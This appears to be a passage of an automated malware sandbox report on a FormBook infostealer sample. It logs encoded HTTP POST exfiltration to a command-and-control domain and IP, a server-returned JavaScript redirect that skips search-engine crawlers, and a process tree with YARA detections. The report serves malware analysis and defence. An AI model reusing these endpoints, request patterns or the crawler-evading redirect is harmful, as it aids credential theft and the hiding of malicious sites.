                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.2249204172.81.61.224802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:16.993396044 CEST748OUTPOST /1tk5/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.moritynomxd.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.moritynomxd.xyz
                                                      Referer: http://www.moritynomxd.xyz/1tk5/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 64 32 71 44 58 77 41 55 38 4d 44 57 6d 68 6b 5a 63 4a 6d 56 68 32 38 51 62 71 4f 58 6a 4f 42 6a 4a 72 7a 74 66 64 6b 49 79 70 36 67 4b 73 48 42 36 72 55 77 64 7a 65 53 35 56 4f 49 50 4c 38 4c 63 66 6a 72 41 48 2b 48 49 67 68 35 6d 42 69 36 50 63 54 39 49 66 38 59 57 52 43 69 73 42 52 2b 46 75 74 6a 4b 68 4e 32 7a 6b 69 75 64 38 51 38 68 6f 45 6a 73 52 38 35 59 66 45 6a 2f 41 31 41 68 77 67 4b 59 46 47 55 38 4e 37 67 6e 57 68 48 78 52 2b 42 46 49 66 79 6d 69 41 78 76 42 51 2f 41 5a 50 31 36 39 41 76 71 30 2b 49 37 44 4c 67 4f 4d 52 65 33 4c 79 68 42 47 4c 65 6c 5a 2b 48 53 41 3d 3d
                                                      Data Ascii: 00yp=d2qDXwAU8MDWmhkZcJmVh28QbqOXjOBjJrztfdkIyp6gKsHB6rUwdzeS5VOIPL8LcfjrAH+HIgh5mBi6PcT9If8YWRCisBR+FutjKhN2zkiud8Q8hoEjsR85YfEj/A1AhwgKYFGU8N7gnWhHxR+BFIfymiAxvBQ/AZP169Avq0+I7DLgOMRe3LyhBGLelZ+HSA==
                                                      Sep 19, 2024 15:07:17.737762928 CEST728INHTTP/1.1 200 OK
                                                      Content-Type: text/html; charset=utf-8
                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                      X-Ratelimit-Limit: 500
                                                      X-Ratelimit-Remaining: 498
                                                      X-Ratelimit-Reset: 1726754834
                                                      Date: Thu, 19 Sep 2024 13:07:17 GMT
                                                      Content-Length: 458
                                                      Connection: close
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.2249205172.81.61.224802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:19.539405107 CEST2472OUTPOST /1tk5/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.moritynomxd.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.moritynomxd.xyz
                                                      Referer: http://www.moritynomxd.xyz/1tk5/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 64 32 71 44 58 77 41 55 38 4d 44 57 6b 41 55 5a 50 34 6d 56 30 47 38 54 48 61 4f 58 74 75 42 6e 4a 72 2f 74 66 63 67 6d 79 63 43 67 4c 2f 50 42 39 4f 67 77 66 7a 65 53 2f 56 50 50 4c 4c 39 49 63 66 6e 4e 41 44 36 58 49 6c 5a 35 6b 6d 6d 36 65 4f 37 79 41 50 38 67 41 68 43 6c 73 42 52 52 46 75 39 2f 4b 68 49 54 7a 6b 36 75 64 49 6f 38 6e 59 45 69 70 52 38 35 59 66 45 33 2f 41 30 6a 68 77 35 4a 59 48 6d 45 38 37 2f 67 6e 33 42 48 30 79 57 43 4e 6f 66 32 72 43 42 76 72 7a 74 6c 59 49 37 35 32 4e 59 4c 72 46 36 72 6d 45 2f 41 48 74 5a 4e 35 59 32 71 4d 78 47 52 72 6f 44 2b 51 76 34 63 4c 4b 62 44 2b 59 63 54 30 63 78 49 32 35 33 36 52 67 43 65 4a 62 51 41 6a 6b 55 58 56 78 73 48 4c 35 72 50 64 54 68 31 67 47 6b 51 48 58 42 50 53 77 48 48 54 56 33 62 76 57 69 52 54 5a 30 36 73 79 76 71 75 6e 43 58 39 66 61 55 36 62 37 63 44 5a 36 6e 38 4e 6f 7a 78 35 6e 76 62 5a 48 66 4e 62 62 44 32 6d 4e 48 72 5a 4e 48 46 41 4c 52 7a 4a 71 6f 4b 53 35 55 76 4d 6c 36 6b 46 66 6e 66 72 2f 52 5a 4e 52 34 44 [TRUNCATED]
                                                      Data Ascii: 00yp=d2qDXwAU8MDWkAUZP4mV0G8THaOXtuBnJr/tfcgmycCgL/PB9OgwfzeS/VPPLL9IcfnNAD6XIlZ5kmm6eO7yAP8gAhClsBRRFu9/KhITzk6udIo8nYEipR85YfE3/A0jhw5JYHmE87/gn3BH0yWCNof2rCBvrztlYI752NYLrF6rmE/AHtZN5Y2qMxGRroD+Qv4cLKbD+YcT0cxI2536RgCeJbQAjkUXVxsHL5rPdTh1gGkQHXBPSwHHTV3bvWiRTZ06syvqunCX9faU6b7cDZ6n8Nozx5nvbZHfNbbD2mNHrZNHFALRzJqoKS5UvMl6kFfnfr/RZNR4DLpt9UGzCpJQ5QfREOkBFu7cLLfNUiguBXKOgPEa/oINN6Iayhva/0SrcTo3EGAdXXSG5MjKEFvtdPbp8mhG/qpLHLui5l2trT4cSXPqqdpYBhTS9qp0XfSVtZQY+9XLUoX65Wrzjod6G2WcFPy+5SmZI3YxWySBTkSB4WVfwohoGa3jKVUc9WlTQqXeeb0mdp37iHhagOeqActGO49BChwpnYzVqgTs9ioq6AmiWRCzGkgkYdnQq0lHlgNfFaXHPKzHwYeeDSwvpBIvdqpPkLtrQoZ4a6UaLRLLERkb4JkqgNyxWQd0kQn3xEg1+hruxFouT7au39n+p6SvNXsoSpMFwesD8nRLN/qMQPjSJjok6Izf4ORIUQ3GbJRQTCbra/Mehj5W/mdYuS5852GmM5x4vK6uUbRzsXzdyMvV6pu6pCboXrB0c3c7Ms+Q3b9L3gYD5UO8MIincBYd9XPCFYZKa8e4inBk++uTm2SETuQfw1F+4NLaOgz2HDqQT4Up90LSjCQP9HlOUMF6R9+eM4cgopzJJ1e20nGv556vwscQKVecOA14cgazDBselXqdQnjli8SohRNJA+81QPSbTr8kunqsndUlInN51wAtwhVzmr4izE+QVrNoAFUHqtaGveI+6qAtp/fDKmCdsF8Hl9reBfbq8bBJ4VZ [TRUNCATED]
                                                      Sep 19, 2024 15:07:19.544675112 CEST1701OUTData Raw: 65 35 72 52 58 4f 70 72 4f 5a 50 49 35 4b 4f 37 4a 42 53 6c 66 34 51 76 4a 7a 63 78 4a 39 71 44 45 51 50 4b 6d 68 6a 65 6e 5a 69 36 55 64 42 69 66 73 68 66 7a 6e 4a 55 63 49 33 6c 42 57 4c 56 7a 75 2f 6d 34 6a 50 37 69 53 63 7a 56 35 31 6f 51 47
                                                      Data Ascii: e5rRXOprOZPI5KO7JBSlf4QvJzcxJ9qDEQPKmhjenZi6UdBifshfznJUcI3lBWLVzu/m4jP7iSczV51oQGpIFyMOUgrL1pM5mMtF56n3h2WSjNPz/pbudtuA73jEEIjoTCWk6K4N1JpjnFJ4sYCBob8nsXFMyoyRakmkiYGh7dbXhvJNnc+bPJBPIF7Ub1CV6ntDhuMRwoQnMaOPCSrlJYv9vClXmM07VTrDEtqNvpgILBeMrnY
                                                      Sep 19, 2024 15:07:20.106592894 CEST728INHTTP/1.1 200 OK
                                                      Content-Type: text/html; charset=utf-8
                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                      X-Ratelimit-Limit: 500
                                                      X-Ratelimit-Remaining: 497
                                                      X-Ratelimit-Reset: 1726754834
                                                      Date: Thu, 19 Sep 2024 13:07:20 GMT
                                                      Content-Length: 458
                                                      Connection: close
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.2249206172.81.61.224802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:22.078560114 CEST476OUTGET /1tk5/?00yp=Q0CjUHI68ZrfxR5aH7yI0BUJRaW1qetdZOL/CvAk0p6VOu6F8J4bRF77+lLddJtqRvjzBHuHK195sHOnP/TIC5IkHUm3lhR0HPdJF2NbuGauEJoIrdtAli4Deo9a&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.moritynomxd.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:07:22.662457943 CEST728INHTTP/1.1 200 OK
                                                      Content-Type: text/html; charset=utf-8
                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                      X-Ratelimit-Limit: 500
                                                      X-Ratelimit-Remaining: 496
                                                      X-Ratelimit-Reset: 1726754834
                                                      Date: Thu, 19 Sep 2024 13:07:22 GMT
                                                      Content-Length: 458
                                                      Connection: close
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                      Click to jump to process

                                                      Click to jump to process

                                                      • File
                                                      • Registry

                                                      Click to dive into process behavior distribution

                                                      Target ID:0
                                                      Start time:09:03:15
                                                      Start date:19/09/2024
                                                      Path:C:\Users\user\Desktop\ncOLm62YLB.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\ncOLm62YLB.exe"
                                                      Imagebase:0x400000
                                                      File size:1'400'845 bytes
                                                      MD5 hash:BA75F7CC380FDD122467994B56EE9A1C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      Target ID:2
                                                      Start time:09:03:16
                                                      Start date:19/09/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\ncOLm62YLB.exe"
                                                      Imagebase:0x4a0000
                                                      File size:20'992 bytes
                                                      MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:09:03:46
                                                      Start date:19/09/2024
                                                      Path:C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe"
                                                      Imagebase:0xf30000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:09:03:48
                                                      Start date:19/09/2024
                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\taskkill.exe"
                                                      Imagebase:0x410000
                                                      File size:77'824 bytes
                                                      MD5 hash:94BDCAFBD584C979B385ADEE14B08AB4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      Target ID:5
                                                      Start time:09:04:00
                                                      Start date:19/09/2024
                                                      Path:C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe"
                                                      Imagebase:0xf30000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      Target ID:8
                                                      Start time:09:04:15
                                                      Start date:19/09/2024
                                                      Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0xc60000
                                                      File size:517'064 bytes
                                                      MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      No disassembly